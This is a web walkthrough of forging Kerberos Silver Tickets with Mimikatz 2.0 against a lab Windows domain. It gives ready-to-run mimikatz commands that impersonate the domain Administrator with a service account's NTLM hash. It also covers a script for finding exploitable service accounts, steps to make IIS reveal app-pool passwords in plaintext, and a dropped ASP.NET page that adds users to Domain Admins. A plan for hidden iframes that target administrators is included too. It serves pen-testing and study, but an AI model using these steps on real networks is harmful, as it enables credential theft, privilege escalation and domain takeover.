Home > Projects > Mimikatz 2.0 - Silver Ticket Walkthrough
Mimikatz 2.0 - Silver Ticket Walkthrough
Table of contents
Silver Tickets: Why You Should Care
Understanding the implications of the Silver Ticket functionality is not as straightforward as for Golden Tickets. The details are below, but this is the key difference: Golden Tickets allow an attacker who has already compromised a domain to have so much power that they will probably never be removed from that domain. Silver Tickets potentially allow an attacker to quickly escalate from "non-privileged domain user" to "I have the Golden Ticket now!", as long as they can obtain access to a non-privileged domain account and local admin access to a single Windows® workstation or server.
As in the writeup on Golden Tickets (see Mimikatz 2.0 - Golden Ticket Walkthrough), I'm going to gloss over a lot of the detail here. To make a long story short, Silver Tickets act similarly to Golden Tickets, but can potentially be obtained more easily because generating them requires knowledge of the encryption key(s)/NTLM hash for a computer or service account, not the krbtgt account. The trade-off is that their scope of use is much more narrow — they can generally only be used to effect changes on a particular target system, not across an entire Windows® domain. However, there are some very important exceptions to that statement which will be discussed below.
Silver Tickets take advantage of a less-secure default configuration in newer versions of Windows® network services will only validate the part of a Kerberos ticket which is signed using the encryption key for the account under which that service is running. The part which is signed using the krbtgt account (the "PAC") is ignored, because validating it would require that the service communicate with a domain controller (a performance penalty).
The same information that was necessary to obtain a Golden Ticket is necessary for a Silver Ticket, except that instead of the encryption keys/NTLM hash for the krbtgt account, you need one of the keys for the account under which the target service is running. E.g. if it is running as LocalSystem, you need the keys/hash for the computer account's password. If it is running as a service account, you need the keys/hash for that account's password, et cetera.
In addition, you will also need the DNS name under which the SPN for the service is registered, and the service type. E.g. if you are accessing a Kerberos-authenticated web application at http://sharepoint.vln2012.local/, the former would be sharepoint.vln2012.local, and the latter would be http. If you will be accessing \\sharepoint.vln2012.local\shared_content as a fileshare, the target name would be the same, but the service would be cifs. See the Built-in Windows® Kerberos Service Names section below for a complete list. If you are accessing the remote system by its actual Windows® machine name, then its fully-qualified domain name is what you will use for the DNS name (the target parameter, below).
The focus of the presentation I attended in the Autumn of 2014 was on using computer accounts to generate Silver Tickets. This is certainly a very useful approach, but it requires obtaining the encryption keys for those accounts, which generally requires local admin access to the target system at some point in the recent past. I believe that Silver Tickets based on service accounts with explicitly-registered SPNs are a much more easily-misused option for pen-testers. For more details, see Silver Tickets and Service Accounts, below.
Silver Tickets can be used in much the same way Golden Tickets can — to cause woe to forensic investigators looking at event/IIS log entries by spoofing usernames and RIDs/SIDs, injecting additional groups (or users-as-groups) into the ticket that are not actually present in the group membership for the account they're spoofing, et cetera.
The following series of commands will purge the current Kerberos tickets, inject a new one for that example web application, and then open a command prompt in the context of that spoofed ticket:
privilege::debug
kerberos::purge
kerberos::golden /domain:vln2012.local /sid:S-1-5-21-3871786346-2057636518-1625323419 /rc4:1f283650874056bee92c7d9d5e6d860c /user:"Administrator" /id:500 /groups:500,501,513,512,520,518,519 /target:sharepoint.vln2012.local /service:http /ptt
misc::cmd
As long as the domain Administrator account has full access to that SharePoint system, it should now be possible to launch Internet Explorer from that command prompt (see the Golden Ticket writeup if this is unclear), and do whatever you like.
Important! — just as with Golden Tickets, depending on the client and server configurations as well as Windows® own whims, you may need to try either the unqualified or fully-qualified name of the target system in order to get a successful authentication. For example, if accessing http://sharepoint.vln2012.local/ gives you an authentication popup, try http://sharepoint/ instead (or vice-versa). The same goes for UNC paths (\\server2012dc\c$ versus \\server2012dc.vln2012.local\c$).
Silver Tickets and Service Accounts
Windows computer account passwords are randomly-generated, extremely long, and automatically rotate. Attempting to guess one would be foolish. However, if a network service is listening as a domain service account, the encryption key/hash used will be the one for that domain account. This is this interesting because service accounts often have much weaker passwords than computer accounts, and they are often changed infrequently. If even one of these accounts can be discovered, it can become a gateway to operating as any account on the domain — at least as far as the network services in question are concerned.
Under normal conditions, finding every domain network service account on a Windows® domain is a bit of a headache. Fortunately, I've saved you the trouble by writing a VBScript (also available at the bottom of this page in the Silver Ticket Tools package). I used VBScript so that even if run on a stock Server 2003 system, it would still operate (PowerShell would not). This script will output a tab-delimited text report of all accounts on the target domain which are likely to be misusable for Silver Ticket purposes, and whether they're unconstrained or their constraints if there are any.
Accounts are listed if they are trusted for delegation (constrained or unconstrained), or if they have SPNs registered. This will, of course, include all of the computer accounts in the domain. If you'd like to filter those out, use something like grep -F -v "$".
It operates against the default Active Directory domain where it is run. If you'd like it to operate against a different domain, you'll need to edit it a little bit. The syntax for running it against the default domain is easy:
cscript -nologo FindTrustedAndSPNAccounts.vbs > accounts.txt
The output includes the various names by which the account is known, as well as its trust level (Constrained or Unconstrained), a list of services it is trusted to impersonate users against (which only applies if it its trust level is Constrained), any SPNs associated with the account, and a list of systems that the account is allowed to log on to (if it is limited in such a way)[2]. Reading the flag that indicates unconstrained delegation requires a logical AND against a field in each account, so all user and computer accounts in the domain must be enumerated and processed before filtering. This means that on a sizeable real-world domain, the script can take awhile to run.
You may be surprised at what you find in the output of this script when run against your own domain at work.
If an account is used for an application pool in IIS, its password can be easily obtained by making a few simple changes to the adsutil.vbs script that is included with IIS:
(note: the steps above are somewhat redundant, but should ensure that you will end up with a re-fanged version of the script no matter which version of IIS you are working with).
The modified script (which I named adsutilNMS.vbs) can now be used the same as the normal version, except it will show "secure" values in plaintext instead of redacting them. For example, to enumerate all application pools and then view the password for the service account used for the pool named UDWebApp1:
cscript -nologo adsutilNMS.vbs ENUM W3SVC/AppPools
cscript -nologo adsutilNMS.vbs ENUM W3SVC/AppPools/UDWebApp1
Edge Case: Changing Domain Group Membership via IIS Running on a Domain Controller
Sadly, despite some promising early results in one lab, I was unable to develop a repeatable process to misuse accounts which were trusted for delegation to "upgrade" Silver Tickets to something more like a Golden Ticket. However, one of the proofs-of-concept does work reliably in an edge case scenario. It requires that all of the following are true:
Any code written in ASP.NET and accessed via the crafted page can be made to execute in the context of an account spoofed via a Silver Ticket. Note that trying to spawn an instance of cmd.exe or another executable will not inherit the spoofed account's identity using this method — all actions must be accomplished using .NET code (or the aforementioned "classic" ASP). It seems likely that someone with more low-level Windows® coding skill could overcome this limitation.
I made a barebones "add an arbitrary user to an arbitrary group" ASP.NET web page based on shell.aspx from the Laudanum Project. It's available at the bottom of this page in the Silver Ticket Tools package. adduser.aspx displays the ID that the web application considers to have authenticated to it (this can be used to verify that your Silver Ticket is working correctly). It accepts two parameters: the DN of a target group, and the DN of a user to add to that group. It is dropped onto an existing web server in the same way that e.g. shell.aspx would be.
As long as the account you are spoofing (or one of the groups you've included in the ticket) has permission to perform this action, you should be able to make any account a member of Domain Admins, Enterprise Admins, et cetera.
Here are the commands I used to create a ticket:
privilege::debug
kerberos::purge
kerberos::golden /domain:vln2012.local /sid:S-1-5-21-3871786346-2057636518-1625323419 /rc4:c105dce9c778f1907275710e5841a21d /user:"Administrator" /id:500 /groups:500,501,513,512,520,518,519 /target:dchostedwebapp.vln2012.local /service:http /ptt
kerberos::golden /domain:vln2012.local /sid:S-1-5-21-3871786346-2057636518-1625323419 /rc4:c105dce9c778f1907275710e5841a21d /user:"Administrator" /id:500 /groups:500,501,513,512,520,518,519 /target:dchostedwebapp /service:http /ptt
misc::cmd
In the spawned command prompt, I then executed the following commands (to make sure there were no existing IE windows around to interfere with the ticket manipulation):
pskill iexplore
"C:\Program Files\Internet Explorer\iexplore.exe"
I then accessed the URL where I'd dropped the file (http://dchostedwebapp/adduser.aspx), and verified that the page indicated I was authenticated as the Administrator account.
Finally, I pasted in the DNs of the user1 account and the Domain Admins group (you can look these up using dsquery, ADSIEdit or other tools[1]), then clicked the Submit button.
Note: the web.config file included with adduser.aspx is specific to .NET 4.0. You'll need to update the System.DirectoryServices assembly reference if a different version of .NET is used for the website being misused.
Edge case: group membership change via silver ticket | ||||||||||||||
|
|
|
|
|
||||||||||
|
||||||||||||||
|
Accounts Which Have been Trusted For Delegation
This is a bit off-topic from Mimikatz (at least for the moment...), but if an account is trusted for delegation, then with a few quick tweaks to adduser.aspx to make it operate automatically, an IIS application running as that account — and for which an SPN has been registered — can be used to build a minefield of e.g. hidden iframes waiting for someone logged on as a domain admin to run across them. For example, the Page Viewer web part in SharePoint. This would be fairly noisy in terms of failed attempts, so if this technique is used inside an attentive organization, it would be a good idea to also add pre-checks to ensure that the account being used is a member of e.g. Domain Admins, Account Operators, or another group with the necessary privileges. This is currently left as an exercise for the reader.
Built-in Windows® Kerberos Service Names
The following list is of all of the built-in service names available in Windows®. This is also the list which is implicitly present if a single SPN (host) exists for a given account.
Other Kerberos-enabled software (including Microsoft® software beyond Windows® itself) may make use of additional service names. For example:
Silver Ticket Technical Details
For those with a technical interest who want a place to get started from for further research, as far as I can tell from the available documentation and from examination of packet captures, the use of Silver Tickets involves Mimikatz forging a TGS directly, without ever obtaining a valid TGT from a KDC. The forged TGS is then used to authenticate directly to the target service — no communication with an actual KDC is involved. This is possible because by default, Windows® Vista® and later do not validate the PAC (the part of the TGS which is signed by the KDC using the krbtgt encryption key), and only validate that the TGS has been signed using the key for the target service. This seems like a much easier hole for Microsoft® to patch out than the Golden Ticket functionality, so enjoy it while it lasts, I guess. If I've gotten any of that wrong, please let me know.
The information in this writeup is based on six primary sources:
Download | ||||
File | Size | Version | Release Date | Author |
Silver Ticket Tools | 16 KiB | 1.0 | 2014-11-09 | Ben Lincoln and the Laudanum Project |
1. |
The dsquery syntax to search for a user or group DN based on the SAM account name (what everyone except Active Directory nerds thinks of as "the username") is (for the username user1):
dsquery * domainroot -filter "(sAMAccountName=user1) For the Domain Admins group: dsquery * domainroot -filter "(sAMAccountName=Domain Admins) |
2. | Hey, now you know where to look for a vulnerable application running as that account! Thanks, Active Directory! |